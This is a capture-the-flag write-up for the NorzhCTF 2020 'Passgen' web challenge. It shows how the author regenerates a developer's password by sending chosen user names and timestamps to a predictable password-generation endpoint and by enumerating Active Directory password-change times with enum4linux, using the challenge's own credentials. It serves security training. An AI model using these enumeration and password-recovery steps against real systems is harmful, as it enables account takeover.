# Passgen

NorzhCTF 2020 - WEB (250 pts).

# Passgen

## SUMMARY

Norzh Nuclea has developed a password generation tool.

Check the reliability of this project and find a way to get the password of its developer.

Flag format: ENSIBS{DEVELOPER_PASSWORD}.

## TL;DR

The password generation application has been implemented in a way that it allows us to set an arbitrary user and timestamp to generate a password. Thus, we’re able to regenerate a user’s password without knowing the actual password generation algorithm.

## WRITEUP

### Web application

Using the secretary account (reahbre:w5g64PJ@CjMn2XMZ) we’ve access to the Norzh Nuclea’s Intranet:

The first application, called Passgen is an application that can be used to “generate a new password for your user account”.

Let’s try it:

On 09 December 2019 at 15:18:10, the generated password for reahbre was oZEvLaSDP)e9H9fD.

According to the description, a new password is generated every minutes and the generation algorithm is secure.

We’re also informed that the maintainer is bouchfor@norzh.nuclea. Since the challenge purpose is to get the developer’s password, we should take a look at the password generation process.

By closely inspecting the page sources, we can see that the password generation algorithm takes the user name and date as input and returns the password:

$.post('/password', data={"user": user, "ts": Date.now()}, function(password) {$("#password").text(password);
});


Let’s try to retrieve our own previous password!

$.post('/password', data={'user': 'reahbre', 'ts': new Date('09 December 2019, 15:18:10').getTime()}).done(function(data){ console.log(data) });  Result: oZEvLaSDP)e9H9fD And it worked! Let’s check if we’re able to get the current password for the user ̀bouchfor: $.post('/password', data={'user': 'bouchfor', 'ts': new Date().getTime()}).done(function(data){
console.log(data)
});


Result: #Lg8lWL6NThPKix^

This is promising, but we need additional information to get the bouchfor’s password…

### Bouchfor account information

By analyzing the server’s network, we discovered an Active Directory server on which we can authenticate.

Assuming that bouchfor used this password generation tool to generate his password, we should be able to get it based on the password change date:

enum4linux -u "NORZH\reahbre" -p "w5g64PJ@CjMn2XMZ" -U -d 10.13.42.248 | tee report.txt


grep -E "(User Name)|(Password last set Time)" report.txt | perl -p -e 's/[\t ]+User Name[\t ]+:[\t ]+([^\n]+)\n/${1} > /g; s/[\t ]+Password last set Time[\t ]+:[\t ]+//g' | sort -t">" -k2.2n -k2.3M -k2.4n -k2.5  Result: HealthMailbox840e241 > Wed, 11 Dec 2019 07:26:35 EST HealthMailbox03fb722 > Wed, 11 Dec 2019 07:26:36 EST reahbre > Wed, 11 Dec 2019 08:27:54 EST bouchfor > Wed, 11 Dec 2019 08:30:11 EST ...  According to the password reset date, both the user reahbre and bouchfor reset their password on 04 Dec 2019 05:04. Let’s see if our password has been generated using this tool: $.post('/password', data={'user': 'reahbre', 'ts': new Date('Wed, 11 Dec 2019 08:27:54 EST').getTime()}).done(function(data){
console.log(data)
});


Result: w5g64PJ@CjMn2XMZ

Perfect! Let’s get the password of the bouchfor account:

\$.post('/password', data={'user': 'bouchfor', 'ts': new Date('Wed, 11 Dec 2019 08:30:11 EST').getTime()}).done(function(data){
console.log(data)
});


Result: TC1BNJ6vf^SLPS4D

We can now authenticate ourself on the Intranet using the bouchfor account:

## FLAGS

The final flag is: ENSIBS{TC1BNJ6vf^SLPS4D}

Happy Hacking!

Creased